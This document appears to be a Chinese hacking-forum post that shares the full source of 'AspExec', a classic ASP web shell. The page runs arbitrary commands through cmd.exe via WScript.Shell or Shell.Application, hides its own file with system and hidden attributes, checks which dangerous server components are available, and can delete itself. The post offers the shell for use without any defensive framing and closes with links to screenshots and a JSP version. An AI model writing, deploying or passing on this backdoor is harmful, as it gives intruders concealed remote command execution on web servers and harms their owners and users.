成品aspexec - 效仿aspx版本 自定义cmd参数

admin

1. <object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
   
2. <%if err then%>
   
3. <object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
   
4. <% end if %>
   
5. <%
   
6. 'hidded shell
   
7. dim file_name
   
8. file_name = Server.MapPath("./") & Replace(Request.ServerVariables("Script_Name"),"/","")
   
9. set fso = createobject("scripting.filesystemobject")
   
10. set file = fso.getfile(file_name)
    
11. file.attributes = 1+2+4
    
12. %>
    
13. <%
    
14. 'exec command
    
15. Dim path,parms,method,result
    
16. path=Trim(Request("path"))
    
17. parms=Trim(Request("parms"))
    
18. method=Trim(Request("submit"))
    
19. result=""
    
20. If path="" Then path="C:\WINDOWS\system32\cmd.exe"
    
21. If parms="" Then parms="/c "
    
22. If method="wscript.shell" Then
    
23. result=shell.exec(path&" "&parms).stdout.readall
    
24. Elseif method="shell.application" Then
    
25. set newshell=createobject("shell.application")
    
26. newshell.ShellExecute path,parms,"","open",0
    
27. result="Shell.application Execute OK."
    
28. Elseif method="self.delete" Then
    
29. file.attributes = 0
    
30. fso.deletefile(file_name)
    
31. set fso = nothing
    
32. End If
    
33. %>
    
34. <html>
    
35. <head>
    
36. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    
37. <meta http-equiv="pragma" content="no-cache">
    
38. <title>AspExec</title>
    
39. <style>
    
40. textarea{resize:none;}
    
41. table.gridtable {
    
42. font-family: verdana,arial,sans-serif;
    
43. font-size:11px;
    
44. color:#333333;
    
45. border-width: 1px;
    
46. border-color: #666666;
    
47. border-collapse: collapse;
    
48. }
    
49. table.gridtable th {
    
50. border-width: 1px;
    
51. padding: 5px 8px;
    
52. border-style: solid;
    
53. border-color: #666666;
    
54. background-color: #dedede;
    
55. }
    
56. table.gridtable td {
    
57. border-width: 1px;
    
58. padding: 5px 8px;
    
59. border-style: solid;
    
60. border-color: #666666;
    
61. background-color: #ffffff;
    
62. }
    
63. a:link{text-decoration:none; color:#111;}
    
64. a:visited {text-decoration:none; color:#111;}
    
65. a:hover {text-decoration:none; color:#111;}
    
66. a:active {text-decoration:none; color:#111;}
    
67. </style>
    
68. </head>
    
69. <body>
    
70. <br/>
    
71. <form method="post" action="<%=Request.ServerVariables("SCRIPT_NAME")%>" id="submitf">
    
72. <table class="gridtable" width="100%" style="FILTER: progid:DXImageTransform.Microsoft.Shadow(color:#f6ae56,direction:145,strength:15);">
    
73. <tr><td colspan="2" align="center"><h2><a href = "http://le4f.net/" target="_blank">AspExec</a></h2></td></tr>
    
74. <tr>
    
75. <td>
    
76. <table class="gridtable">
    
77. <%
    
78. Dim theComponent(7)
    
79. theComponent(0) = "Scripting.FileSystemObject"
    
80. theComponent(1) = "WScript.Shell"
    
81. theComponent(2) = "WScript.Shell.1"
    
82. theComponent(3) = "WScript.Network"
    
83. theComponent(4) = "WScript.Network.1"
    
84. theComponent(5) = "shell.application"
    
85. theComponent(6) = "shell.application.1"
    
86. Function IsObjInstalled(strClassString)
    
87. On Error Resume Next
    
88. IsObjInstalled = False
    
89. Err = 0
    
90. Dim xTestObj
    
91. Set xTestObj = Server.CreateObject(strClassString)
    
92. If -2147221005 <> Err Then
    
93. IsObjInstalled = True
    
94. Else
    
95. IsObjInstalled = False
    
96. End if
    
97. Set xTestObj = Nothing
    
98. Err = 0
    
99. End Function
    
100. %>
     
101. <tr><th colspan="2" align="center">Component</th></tr>
     
102. <%
     
103. Dim i
     
104. For i=0 to UBound(theComponent)-1
     
105. If IsObjInstalled(theComponent(i)) Then
     
106. Response.Write "<tr><td width='80'>" & theComponent(i) & "</td><td><font color=""green"">√</font></td></tr>" & vbCrLf
     
107. Else
     
108. Response.Write "<tr><td width='80'>" & theComponent(i) & "</td><td><font color=""red"">×</font></td></tr>" & vbCrLf
     
109. End if
     
110. Next
     
111. %>
     
112. </table>
     
113. </td>
     
114. <td width="100%">
     
115. <DIV align=center
     
116. style='
     
117. color: #990099;
     
118. background-color: #E6E6FA;
     
119. width: 100%;
     
120. height: 180px;
     
121. scrollbar-face-color: #DDA0DD;
     
122. scrollbar-shadow-color: #3D5054;
     
123. scrollbar-highlight-color: #C3D6DA;
     
124. scrollbar-3dlight-color: #3D5054;
     
125. scrollbar-darkshadow-color: #85989C;
     
126. scrollbar-track-color: #D8BFD8;
     
127. scrollbar-arrow-color: #E6E6FA;
     
128. '>
     
129. Path:<input type="text"  value=<% Response.Write path %>   name="path"  style='width:100%;'>
     
130. Parms:<textarea name="parms" style='width:100%;height:70%;'><% Response.Write parms %></textarea>
     
131. </DIV>
     
132. <input type="submit" name= "submit" value="wscript.shell">
     
133. <input type="submit" name= "submit" value="shell.application">
     
134. <input type="submit" name= "submit" value="self.delete">
     
135. <lable>Current Dir : <%response.write request.servervariables("APPL_PHYSICAL_PATH")%></lable>
     
136. </td>
     
137. </tr>
     
138. <tr><th colspan="3" align="center">Result</th></tr>
     
139. <tr><td colspan="3" align="center"><textarea name="result" style='width:100%;height:270px;'><% Response.Write result %></textarea></td></tr>
     
140. </table>
     
141. </form>

复制代码

效果是这样

[/url]

x64 下这样

[url=http://www.binghesec.com/wp-content/uploads/2015/08/123549654llcha-7.png]

OK 完美解决

Jsp版本：https://www.chinabaiker.com/thread-1596-1-1.html